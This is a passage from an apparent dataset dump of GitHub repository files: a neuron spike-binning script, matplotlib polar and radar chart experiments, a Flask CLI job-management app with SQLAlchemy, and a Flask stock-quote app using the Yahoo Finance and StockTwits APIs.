\n '''\n \n if end >= 1:\n \n mid_point = midpoint(start, end)\n \n # If our spike is inside the interval, let's return the index\n if inside(spikes[mid_point], interval):\n return spikesInInterval(spikes, interval, mid_point)\n\n # If our spike is greater than (or less than) the interval, let's adjust checking bounds\n elif spikes[mid_point] > interval[1]:\n\n next_midpoint = midpoint(start, mid_point-1)\n\n # If this is true, then we're going to hit a recursion error...\n # We don't want that to happen.\n if mid_point == next_midpoint:\n return -1\n \n return binarySearch(spikes, interval, start, mid_point-1)\n\n elif spikes[mid_point] < interval[0]:\n \n next_midpoint = midpoint(mid_point+1, end)\n \n # If this is true, then we're going to hit a recursion error...\n # We don't want this. \n if mid_point == next_midpoint:\n return -1\n \n return binarySearch(spikes, interval, mid_point+1, end)\n\n else:\n\n return -1\n\n\ndef spikesInInterval(spikes, interval, known):\n '''\n Description\n -----------\n 'spikesInInterval' will find all spikes in a certain interval based on the index of one found in the interval. \n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n 'known' : int. Index in 'spikes' of a known spike in the interval.\n\n Output(s)\n ---------\n 'spike_set': set. indices of all spikes in the interval. This is converted to a list when returned.\n '''\n\n # Index of known spike\n i = known\n\n # Boolean variables we'll be using to determine if we're either checking 'above' or 'below' the known value.\n # 'DOWN' is true because we'll start by checking below the known spike\n DOWN = True\n UP = False\n\n # Set of spikes. We'll be using a set because 1) sets can't have duplicates and 2) checking for duplicates can be done in constant O(1) time. 
\n spike_set = set()\n \n # We don't want to check out of bounds of the spikes list.\n while i > -1 and i < len(spikes):\n\n if inside(spikes[i], interval) and DOWN:\n spike_set.add(spikes[i])\n i = i - 1\n \n elif not inside(spikes[i], interval) and DOWN:\n i = known + 1\n UP = True\n DOWN = False\n \n elif inside(spikes[i], interval) and UP:\n spike_set.add(spikes[i])\n i = i + 1\n \n elif not inside(spikes[i], interval) and UP:\n break\n\n # Convert set to list, then return.\n return np.array(list(spike_set))\n \n\ndef inside(spike, interval):\n '''\n Description\n -----------\n 'inside' will determine if a spike is in an interval.\n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n\n Output(s)\n --------\n boolean. True if spike is in interval. False otherwise.\n '''\n \n return spike >= interval[0] and spike <= interval[1]\n\n\ndef midpoint(start_rate, end_rate):\n '''\n Description\n -----------\n 'midpoint' will calculate midpoint between two points\n \n Input(s)\n --------\n 'start_rate' : int. beginning\n 'end_rate' : int. end\n\n Output(s)\n --------\n int. midpoint between 'start_rate' and 'end_rate'\n '''\n \n return int(start_rate + (end_rate - start_rate)/2)\n\n \ndef insertToBin(spiketime, end):\n '''\n Description\n -----------\n 'insertToBin' will bin that a spiketime belongs in\n \n Input(s)\n --------\n 'spiketime' : int. spike time in ms\n 'end' : int. end of trial\n\n Output(s)\n --------\n int. idx. Index that the spiketime belongs to\n ''' \n \n idx = int( (spiketime - (spiketime % width)) / width )\n \n if( idx > end ): \n #print(\"spiketime \" + str(spiketime) + \"\\tidx \" + str(idx))\n idx = end\n\n return idx \n\n\n\ndef saveProbeData(MOUSE_ID, probe_name, nwb):\n '''\n Description\n -----------\n 'saveProbeData' save the data, using pandas, of a certain mouse given a certain probe.\n \n Input(s)\n --------\n 'MOUSE_ID' : int. 
ID of mouse we'll be looking at\n 'probe_name': string. name of probe\n 'nwb' : h5py._hl.files.File. Dataset\n\n Output(s)\n --------\n None.\n '''\n \n # Changes depending on the trial.\n start = 0 #in second\n end = 2000 #in seconds\n \n # time stamps ( this never changes )\n # This is SPECIFICALLY for the 'drifting_gratings_2' stimulus\n timestamps = nwb['stimulus']['presentation']['drifting_gratings_2']['timestamps'].value\n stim_orient = nwb['stimulus']['presentation']['drifting_gratings_2']['data'].value\n \n \n ## Adding spikes\n # Get all cells that are in V for every probe\n #print(probe_name)\n probe = Probe(nwb, probe_name)\n \n # Going to want to save this information later.\n filename = MOUSE_ID + \"_\" + probe_name\n \n # ...get every cell. Then...\n cells = probe.getCellList()\n \n # ... for every cell...\n for cell in cells:\n \n # (Getting current cell)\n curr_cell = probe.getCell(cell)\n \n # ...get the current cells spiking activity.\n spikes = nwb['processing'][probe_name]['UnitTimes'][str(cell)]['times'].value\n \n # For every occurrence of each kind of stimulus\n for i in range(len(timestamps)):\n \n # Extract interval of stimulus, temporal frequency of stimulus, and angle of stimulus.\n trial = timestamps[i]\n freq = stim_orient[i][1]\n angle = stim_orient[i][3]\n \n # Checking for 'nans'\n if not (str(freq) == \"nan\") or not (str(angle) == \"nan\"):\n \n freq = int(freq)\n angle = int(angle)\n \n # Convert freq and angle to something that can be used as an index. \n config = str(freq) + \"_\" + str(angle) \n \n # Search for all spikes that are in this time frame. 
\n stimulus_spikes = binarySearch(spikes, trial, 0, len(spikes)-1)\n \n \n if not (type(stimulus_spikes) == type(-1)):\n # questionable but should do the trick (to get everything between 0 and 2000 ms)\n stimulus_spikes = (stimulus_spikes - trial[0])\n \n stimulus_spikes *= 1000\n \n # For all the spikes you just found, add them to the their respective bin.\n for stim_spike in stimulus_spikes:\n curr_cell.addSpike(config, stim_spike, end)\n \n print(\"Saving to \" + filename)\n \n with open(filename, 'wb') as f:\n pickle.dump(probe, f)\n \n\ndef fromFreqList(x):\n '''\n Description\n -----------\n 'fromFreqList' converts frequency list to a list of repitions based on index. This is usefull for histograms.\n\n Example\n -------\n fromFreqList([2,1,4,2]) => [0,0,1,2,2,2,2,3,3]\n \n Input(s)\n --------\n 'x': list of ints. \n\n Output(s)\n --------\n 'z': list of ints.\n ''' \n z = []\n for i in range(len(x)):\n y = [ i for ii in range(int(x[i])) ]\n for num in y:\n z.append(num)\n\n return z\n\ndef robj_to_dict(robj):\n '''\n Description\n -----------\n 'robj_to_dict' converts an R object to a python dictionary\n \n Input(s)\n --------\n 'robj': R object \n\n Output(s)\n --------\n dictionary.\n\n Source\n ------\n https://medium.com/bigdatarepublic/contextual-changepoint-detection-with-python-and-r-using-rpy2-fa7d86259ba9\n \n ''' \n return dict(zip(robj.names, map(list, robj)))\n" } ]
10
Superbeet/Radar-Chart
https://github.com/Superbeet/Radar-Chart
a7461ac222402aec374bc7e14b918b18ae0e592f
99932b27395372cd27820ab705c62b7dc0ae3c1b
6e5864db2cacc99b97452f0344cdf056c15c1b79
refs/heads/master
2016-09-05T23:50:17.497778
2014-07-23T18:22:59
2014-07-23T18:22:59
22,126,438
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7117117047309875, "alphanum_fraction": 0.7117117047309875, "avg_line_length": 26.5, "blob_id": "0fa0c5102c003d94a64c1808aef65836c4287bf0", "content_id": "63fe2760b4af4af2e75d0e21a67537015b624585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 84, "num_lines": 4, "path": "/README.md", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "Radar-Chart\n===========\n\nThis resposity is built for storing some basic examples to build the Tool of Change. \n" }, { "alpha_fraction": 0.4847009778022766, "alphanum_fraction": 0.5319888591766357, "avg_line_length": 26.150943756103516, "blob_id": "f332981f65a52baf64d282118bfb041e24233307", "content_id": "61e77753dee18676483c27070f0d5b3518ec2f6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 96, "num_lines": 53, "path": "/polar_test_1.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 22, 2014\n\n@author: 507061\n'''\n# Working flow\n# 1.Program the backgroud\n# 2.Program layers\n# 3.Program marks\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Create radius and theta arrays, and a 2d radius/theta array\nradius = np.linspace(0.5,1,100)\ntheta = np.linspace(0,2*np.pi,100) #100 slices\nprint theta\n\nR,T = np.meshgrid(radius,theta)\n\n#Calculate some values to plot\nZfun = lambda R,T: R**2*np.cos(T)\nZ = Zfun(R,T) #color\n\n#Create figure and polar axis\nfig = plt.figure()\nax = fig.add_subplot(111, polar = True)\n\n#-----------------------------------------------------------------------------------\n#Plot flexible graphs\nax.pcolor(T,R,Z) #Plot calculated values\n\n#-----------------------------------------------------------------------------------\n#Plot thick red section and label it\ntheta = 
np.linspace(0,np.pi/4,21) #this is a line\nax.plot(theta,[1.23 for t in theta],color='#AA5555',linewidth=10) #Colors are set by hex codes\n\n#-----------------------------------------------------------------------------------\n#Plot bar chats\nrect = plt.bar(left = (0,1,2),height = (0.5,1,1.5),color='#AA5555',width = 0.35,align=\"center\")\n\n#-----------------------------------------------------------------------------------\n\n\nax.text(np.pi/8,1.25,\"Text\")\n\nax.set_rmax(1.5) #Set maximum radius\n\n#Turn off polar labels\nax.axes.get_xaxis().set_visible(False)\n# ax.axes.get_yaxis().set_visible(False)\n\nplt.show()" }, { "alpha_fraction": 0.5580912828445435, "alphanum_fraction": 0.6473029255867004, "avg_line_length": 19.125, "blob_id": "e064846ec78870cd8dfa658012b6ad4b5c7d56f0", "content_id": "e5dca0e9f36b4c42cd3732823b625e5f185a4b64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/polar_test_2.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 22, 2014\n\n@author: 507061\n'''\nfrom pylab import *\n\nax = axes([0.025,0.025,0.95,0.95], polar=True)\n\nN = 20\ntheta = np.arange(0.0, 2*np.pi, 2*np.pi/N)\nradii = 10*np.random.rand(N)\nwidth = np.pi/4*np.random.rand(N)\nbars = bar(theta, radii, width=width, bottom=0.0)\nprint bars\n\nfor r,bar in zip(radii, bars):\n bar.set_facecolor( cm.jet(r/10.))\n bar.set_alpha(0.5)\n\nax.set_xticklabels([])\nax.set_yticklabels([])\n# savefig('../figures/polar_ex.png',dpi=48)\nshow()" }, { "alpha_fraction": 0.29212889075279236, "alphanum_fraction": 0.5705229640007019, "avg_line_length": 26.449275970458984, "blob_id": "c8ee6daa50b3b7f5373f35fe004a05be1319ba03", "content_id": "c7aefb995451ef18e32d8464cc0d7e35409c6cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": 
"no_license", "max_line_length": 81, "num_lines": 69, "path": "/radar_chart.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n# x = np.arange(-180.0,190.0,10)\n# theta = (np.pi/180.0 )*x # in radians\n# \n# offset = 2.0\n# \n# R1 = [-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358]\n# \n# fig1 = plt.figure()\n# ax1 = fig1.add_axes([0.1,0.1,0.8,0.8],polar=True)\n# ax1.set_rmax(1)\n# ax1.plot(theta,R1,lw=2.5)\n# plt.show()\n\n\n\n\n# x = np.arange(-90.0,95.0,5)\n# # x = [-180. -170. -160. -150. -140. -130. -120. -110. -100. -90. -80. -70.\n# # -60. -50. -40. -30. -20. -10. 0. 10. 20. 30. 40. 50.\n# # 60. 70. 80. 90. 100. 110. 120. 130. 140. 150. 160. 170.\n# # 180.]\n# \n# theta = (np.pi/180.0 )*x # in radians\n# \n# offset = 2.0\n# \n# R2 = [1.642,1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,\\\n# 1.642,1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,1.642,\\\n# 1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,1.642]\n# \n# fig2 = plt.figure()\n# ax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\n# ax2.plot(theta,R2,lw=2.5) \n# ax2.set_rmax(1.5*offset)\n# plt.show()\n\nradian_unit = np.pi/180\n\noffset = 2.0\nxAxis_1 = [0 for i in range(500)]\nyAxis_1 = np.arange(0,5,0.01)\n\nfig2 = plt.figure()\n#rect = l,b,w,h\nax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\nax2.plot(xAxis_1,yAxis_1,lw=2.5) \nax2.set_rmax(1.5*offset)\n\nxAxis_2 = [radian_unit*45 for i in range(500)]\nyAxis_2 = np.arange(0,5,0.01)\n\nax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\nax2.plot(xAxis_2,yAxis_2,lw=2.5) \nax2.set_rmax(1.5*offset)\n\n# style = 'r-'\n# x = np.arange(0, 2*np.pi, 0.1)\n# y = np.sin(x)\n# line = ax2.plot(x, y, style, 
animated=True)[0]\n# line.set_ydata(np.sin(j*x + i/10.0))\n\nplt.show()" } ]
4
Vitaee/FlaskCLIProject
https://github.com/Vitaee/FlaskCLIProject
c3a2a14ba911d91e0e5a0844572a1728af8c9b82
8584f85a944a6ced78de67f2e73a5ee4a8e70141
7931614e675c3794a4e52cabaaf4047f3ccd454c
refs/heads/main
2023-04-26T12:35:15.350531
2021-05-12T18:04:10
2021-05-12T18:04:10
366,806,290
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7543160915374756, "alphanum_fraction": 0.7543160915374756, "avg_line_length": 40.66666793823242, "blob_id": "132d4841490685f77b0d3a46342a14c751340db6", "content_id": "22b41f8729c24a5699530263aa502d5e81262f5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 753, "license_type": "no_license", "max_line_length": 109, "num_lines": 18, "path": "/flaskProject/README.md", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "# Flask CLI Project\n\n### Requirements which is done or can continue to be improved.\n\n- Flask framework must use &check;\n- Command line interface must be used&check;\n- Command line arguments must be used &check;\n- Config file must be used for database server connection and other parameters &check;\n- Log method can be changeable via arguments &check;\n- Jobs should be able to be run asynchronously &check;\n\n### What will to do\n\n- There will be a jobs table on database server, this table can be created with command line argument &check;\n- A job can be added with command line arguments &check;\n- Job list can be get with command line arguments &check;\n- A job's status can be changed &check;\n- A job can be deleted via command line argument &check;\n\n\n\n" }, { "alpha_fraction": 0.6671199202537537, "alphanum_fraction": 0.6701114773750305, "avg_line_length": 29.26749038696289, "blob_id": "223c6cccf784b8d8ccf6b3fb1493bda183aa5cb7", "content_id": "87c11995f09ffa4c43a6ee52506b2bc885bacaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7354, "license_type": "no_license", "max_line_length": 201, "num_lines": 243, "path": "/flaskProject/app.py", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "import datetime, click,threading,asyncio,logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask, request, jsonify, make_response\nfrom flask.cli 
import cli, with_appcontext\nfrom flask_sqlalchemy import SQLAlchemy\nfrom marshmallow import fields\nfrom marshmallow_sqlalchemy import ModelSchema\nfrom flask_migrate import Migrate\n\n\n# Init Flask App\napp = Flask(__name__)\n\n# Init DB\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n# Create Model\nclass Job(db.Model):\n __tablename__ = \"jobs\"\n id = db.Column(db.Integer, primary_key=True)\n job = db.Column(db.String(200), nullable=False)\n status = db.Column(db.Boolean(), nullable=False)\n date_added = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n\n def create(self):\n db.session.add(self)\n db.session.commit()\n return self\n\n def __init__(self, job, status):\n self.job = job\n self.status = status\n\n def __repr__(self):\n return f'{int(self.id)}'\n\n# Define ModelSchema\nclass JobSchema(ModelSchema):\n class Meta(ModelSchema.Meta):\n model = Job\n sqla_session = db.session\n\n id = fields.Number(dump_only=True)\n job = fields.String(required=True)\n status = fields.Boolean(required=True)\n\n\n# Get config file\napp.config.from_pyfile(\"./config/app.conf\",silent=True)\n\n# DB & Secret Key from config file\napp.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://{app.config.get(\"DB_USER\")}:{app.config.get(\"DB_PASS\")}@{app.config.get(\"DB_URL\")}:{app.config.get(\"DB_PORT\")}/{app.config.get(\"DB_DATABASE\")}'\napp.config['SECRET_KEY'] = f'{app.config.get(\"FLASK_SECRET\")}'\n\n# Debug method from config file\nif app.debug is not True and app.config.get(\"LOG_METHOD\") != \"DEBUG\":\n file_handler = RotatingFileHandler('jobsflask.log', maxBytes=1024 * 1024 * 100, backupCount=20)\n file_handler.setLevel(logging.ERROR)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n file_handler.setFormatter(formatter)\n app.logger.addHandler(file_handler)\nelse:\n logging.basicConfig(level=logging.DEBUG)\n\n\n# Define command name and create funciton. 
Creates table named as jobs.\[email protected](name=\"createdb\")\n@with_appcontext\ndef create_db():\n db.create_all()\n app.logger.info(\"Db created.\")\n\n# Changing log method.\[email protected](name=\"logmethod\")\n@with_appcontext\ndef change_log_method():\n print(f\"Inside logmethod function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(change_log())\n app.logger.info('Log method changed')\n return jsonify({\"result\": result})\n\n\n# Adding jobs.\[email protected](name=\"addjob\")\[email protected]('job')\[email protected]('status')\n@with_appcontext\ndef add_job(job,status):\n \n print(f\"Inside addjob function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(create_it(job,status))\n app.logger.info('Job added.')\n return jsonify({\"result\": result})\n\n# Get all jobs.\[email protected](name=\"getjobs\")\n@with_appcontext\ndef get_jobs():\n print(f\"Inside get jobs function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(all_jobs())\n app.logger.info('Jobs are fetched.')\n return jsonify({\"result\": result})\n\n# Update job by id.\[email protected](name=\"updatejob\")\[email protected](\"status\")\[email protected](\"id\")\n@with_appcontext\ndef update_job(id,status):\n print(f\"Inside update job function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(update_job_status(id,status))\n app.logger.info('Job updated.')\n return jsonify({\"result\": result})\n\n# Delete job by id.\[email protected](name=\"deletejob\")\[email protected](\"id\")\n@with_appcontext\ndef deletejob(id):\n print(f\"Inside delete job function: 
{threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(delete_job(id))\n app.logger.info(\"Job deleted.\")\n return jsonify({\"result\": result})\n\n# Adding cli commands.\napp.cli.add_command(create_db)\napp.cli.add_command(add_job)\napp.cli.add_command(get_jobs)\napp.cli.add_command(update_job)\napp.cli.add_command(change_log_method)\n\n\n# Define async functions for jobs.\nasync def create_it(job,status):\n job = str(job.capitalize())\n status = str(status).capitalize()\n data = {\n \"job\":job,\n \"status\":bool(status)\n }\n todo_schema = JobSchema()\n todo = todo_schema.load(data)\n result = await todo_schema.dump(todo.create())\n return result\n\nasync def all_jobs():\n get_jobs = await Job.query.all()\n job_schema = JobSchema(many=True)\n todos = await job_schema.dump(get_jobs)\n return todos\n\nasync def update_job_status(id,status):\n status = str(status).capitalize()\n data = {\n \n \"status\":bool(status),\n }\n get_job = await Job.query.get(int(id))\n get_job.todo_description = data['status']\n db.session.add(get_job)\n db.session.commit()\n todo_schema = JobSchema(only=['id', 'status'])\n todo = await todo_schema.dump(get_job)\n return todo\n\nasync def delete_job(id):\n try:\n get_job = await Job.query.get(int(id))\n except:\n app.logger.error(\"The job does not exist!\")\n \n\n db.session.delete(get_job)\n db.session.commit()\n return \"Job deleted.\"\n\nasync def change_log():\n if app.config.get(\"LOG_METHOD\") == 'Pro':\n app.config.update(LOG_METHOD=\"DEBUG\",APP_DEBUG=True)\n else:\n app.config.update(LOG_METHOD=\"Pro\", APP_DEBUG=False)\n\n return \"Log method changed\"\n\n\n\n# Sample example of CRUD Api.\[email protected]('/create', methods=['POST'])\ndef create_job():\n data = request.get_json()\n todo_schema = JobSchema()\n todo = todo_schema.load(data)\n result = todo_schema.dump(todo.create())\n return make_response(jsonify({\"job\": 
result}), 200)\n\[email protected]('/gets', methods=['GET'])\ndef index():\n get_todos = Job.query.all()\n todo_schema = JobSchema(many=True)\n todos = todo_schema.dump(get_todos)\n return make_response(jsonify({\"jobs\": todos}))\n\[email protected]('/get/<id>', methods=['GET'])\ndef get_job_by_id(id):\n get_todo = Job.query.get(id)\n todo_schema = JobSchema()\n todo = todo_schema.dump(get_todo)\n return make_response(jsonify({\"job\": todo}))\n\[email protected]('/update/<id>', methods=['PUT'])\ndef update_job_by_id(id):\n data = request.get_json()\n get_todo = Job.query.get(id)\n if data.get('job'):\n get_todo.title = data['job']\n if data.get('status'):\n get_todo.todo_description = data['status']\n db.session.add(get_todo)\n db.session.commit()\n todo_schema = JobSchema(only=['id', 'job', 'status'])\n todo = todo_schema.dump(get_todo)\n return make_response(jsonify({\"job\": todo}))\n\[email protected]('/delete/<id>', methods=['DELETE'])\ndef delete_todo_by_id(id):\n get_todo = Job.query.get(id)\n db.session.delete(get_todo)\n db.session.commit()\n return make_response(\"\", 204)\n\nif __name__ == \"__main__\":\n app.run(debug=app.config.get(\"APP_DEBUG\"))" }, { "alpha_fraction": 0.8987341523170471, "alphanum_fraction": 0.8987341523170471, "avg_line_length": 12.333333015441895, "blob_id": "322b3539491a41be3968575fbb4461fd4ae26c5e", "content_id": "a48e824f830383a8f4775ba36b46d37ea92b78a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 22, "num_lines": 6, "path": "/requirement.txt", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "Flask\nFlask-Migrate\nmarshmallow-sqlalchemy\nmarshmallow\nFlask-SQLAlchemy\nasyncio" }, { "alpha_fraction": 0.7771084308624268, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 45.47999954223633, "blob_id": "3b7b40eae03f88e847c2eaa070929b79baca158d", "content_id": 
"8cc6fa2b4615c893fb39edf25f8a3074dfd43a64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 121, "num_lines": 25, "path": "/README.md", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "# Project Overview\nThis project will execute some jobs (ddls/dmls) over a database server asynchronously.\n\n\n# Requirements\n- Flask framework must use\n- Command line interface must be used\n- Command line arguments must be used\n- Config file must be used for database server connection and other parameters\n- Log method can be changeable via arguments (console, log file, etc.), default log method must be defined in config file\n- Jobs should be able to be run asynchronously\n- OOP approach must be used\n- Comments must be added to each element\n- 'Keep it Simple' approach must be used\n\n\n# What Will To Do\n- There will be a jobs table on database server, this table can be created with command line argument\n- A job can be added with command line arguments (May be read different sources: argument/file/etc...)\n- Job list can be get with command line arguments \n- A job's status can be changed as ignore via command line argument\n- A job can be deleted via command line argument\n- A job can start/stop via command line argument\n- Job's state must be checked for desired operation\n- A log item must be added to defined or given log method for each command's result\n" } ]
4
kennandavison/flask-stock-quote
https://github.com/kennandavison/flask-stock-quote
531d065146abd5111a91576ac074e431a3d69780
9eed737b801dcf02ada4b9c8062819fe2ab74add
08314fbe149f955dd78b6cd10f76de08dccdfab9
refs/heads/master
2016-08-10T11:51:50.239094
2016-03-07T20:18:42
2016-03-07T20:18:42
47,805,434
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.48349055647850037, "alphanum_fraction": 0.6816037893295288, "avg_line_length": 14.703703880310059, "blob_id": "82b432ded2b550c1d0a17a7cb3486dac5995125f", "content_id": "53ec117b1c9553c50e940043466a0238ed48202e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 424, "license_type": "no_license", "max_line_length": 21, "num_lines": 27, "path": "/requirements.txt", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "alembic==0.8.3\nclick==5.1\ndecorator==4.0.4\ndict==0.0.2\nFlask==0.10.1\nFlask-API==0.6.4\nFlask-Compress==1.3.0\nFlask-Migrate==1.6.0\nFlask-Script==2.0.5\nFlask-SQLAlchemy==2.1\nget==0.0.2\ngunicorn==19.3.0\nitsdangerous==0.24\nJinja2==2.8\nMako==1.0.3\nMarkupSafe==0.23\npsycopg2==2.6.1\npublic==0.0.2\npython-editor==0.4\nredis==2.10.5\nrequest==0.0.2\nrequests==2.8.1\nrq==0.5.6\nself==0.0.2\nSQLAlchemy==1.0.9\nWerkzeug==0.11.2\nwheel==0.24.0\n" }, { "alpha_fraction": 0.5904631018638611, "alphanum_fraction": 0.5987048745155334, "avg_line_length": 41.82352828979492, "blob_id": "41271fe7e651309ea74a31b57468ff12bce1d620", "content_id": "f55e1c409d83af8df8e2513f37ddac315c5d7343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5096, "license_type": "no_license", "max_line_length": 214, "num_lines": 119, "path": "/app.py", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "from flask import Flask, redirect, render_template\nfrom flask.ext.compress import Compress\nimport requests\nfrom decimal import getcontext, Decimal\n\napp = Flask(__name__)\nCompress(app)\napp.config['DEBUG'] = True\napp.config['TESTING'] = True\n\n\[email protected]('/')\ndef root_redirect():\n return redirect(\"/AAPL\", code=302)\n\n\[email protected]('/<ticker>', methods=['GET'])\ndef check(ticker):\n ticker = ticker.upper() # make ticker uppercase to prevent errors\n yahoo_api = 
requests.get(\"http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20IN%20(%22\" + ticker + \"%22)&format=json&env=http://datatables.org/alltables.env\")\n stocktwits_api = requests.get(\"https://api.stocktwits.com/api/2/streams/symbol/\" + ticker + \".json\")\n getcontext().prec = 5\n\n def parse_yahoo(detail):\n parsed_yahoo_detail = yahoo_api.json()['query']['results']['quote'][detail]\n return parsed_yahoo_detail\n\n def parse_stocktwits_feed():\n stocktwits_feed = {}\n for i in range(0, 30): # 30 is rate limit\n if stocktwits_api:\n message = stocktwits_api.json()['messages'][i]['body']\n username = stocktwits_api.json()['messages'][i]['user']['username']\n stocktwits_feed[i] = message + \" ~\" + username\n return stocktwits_feed\n\n def get_short_term_rating():\n upside = get_upside()\n eps_upside = get_eps_upside()\n if upside and eps_upside is not None:\n upside_weight = upside * Decimal(0.75)\n eps_upside_weight = eps_upside * Decimal(0.25)\n rating = upside_weight + eps_upside_weight\n return rating\n\n def get_upside():\n target_price_parse = parse_yahoo(\"OneyrTargetPrice\")\n price = get_price()\n if target_price_parse and price is not None:\n target_price = Decimal(target_price_parse)\n upside = (Decimal(target_price - price) / price) * 100\n return upside\n\n def get_price():\n ask_parse = parse_yahoo(\"Ask\")\n bid_parse = parse_yahoo(\"Bid\")\n if ask_parse and bid_parse is not None:\n price = (Decimal(ask_parse) + Decimal(bid_parse)) / 2\n return price\n\n def get_eps_upside():\n eps_current_year_parse = parse_yahoo(\"EPSEstimateCurrentYear\")\n eps_next_year_parse = parse_yahoo(\"EPSEstimateNextYear\")\n if eps_current_year_parse and eps_next_year_parse is not None:\n eps_current_year_dec = Decimal(eps_current_year_parse)\n eps_next_year_dec = Decimal(eps_next_year_parse)\n eps_upside = ((eps_next_year_dec - eps_current_year_dec) / abs(eps_current_year_dec)) * 100\n return eps_upside\n\n def 
get_news():\n news = {\n \"stocktwits_url\": \"//stocktwits.com/symbol/\" + ticker,\n 'estimize_url': \"//www.estimize.com/\" + ticker,\n \"earningswhispers_url\": \"//earningswhispers.com/stocks/\" + ticker,\n \"nasdaq_url\": \"//nasdaq.com/earnings/report/\" + ticker,\n \"googlenews_url\": \"//google.com/search?q=\" + ticker + \"+stock&tbm=nws\",\n \"googlefinance_main_url\": \"//google.com/finance?q=\" + ticker,\n \"googlefinance_news_url\": \"//google.com/finance/company_news?q=\" + ticker,\n \"marketbeat_url\": \"//marketbeat.com/stocks/\" + ticker,\n \"closingbell_url\": \"//closingbell.co/stocks/\" + ticker,\n \"bloomberg_url\": \"//bloomberg.com/quote/\" + ticker + \":US\",\n \"thestreet_url\": \"//thestreet.com/quote/\" + ticker + \".html\",\n }\n return news\n\n stock = {\n \"short_term_rating\": get_short_term_rating(),\n \"symbol\": parse_yahoo(\"symbol\"),\n \"name\": parse_yahoo(\"Name\"),\n \"currency\": parse_yahoo(\"Currency\"),\n \"upside\": str(get_upside()) + \"%\",\n \"target_price\": parse_yahoo(\"OneyrTargetPrice\"),\n \"price\": get_price(),\n \"ask\": parse_yahoo(\"Ask\"),\n \"bid\": parse_yahoo(\"Bid\"),\n \"ask_real_time\": parse_yahoo(\"AskRealtime\"),\n \"bid_real_time\": parse_yahoo(\"BidRealtime\"),\n \"amount_change\": parse_yahoo(\"Change\"),\n \"percent_change\": parse_yahoo(\"ChangeinPercent\"),\n \"year_low\": parse_yahoo(\"YearLow\"),\n \"year_high\": parse_yahoo(\"YearHigh\"),\n \"year_range\": parse_yahoo(\"YearRange\"),\n \"day_range\": parse_yahoo(\"DaysRange\"),\n \"volume\": parse_yahoo(\"Volume\"),\n \"market_cap\": parse_yahoo(\"MarketCapitalization\"),\n \"average_daily_volume\": parse_yahoo(\"AverageDailyVolume\"),\n \"eps_upside\": 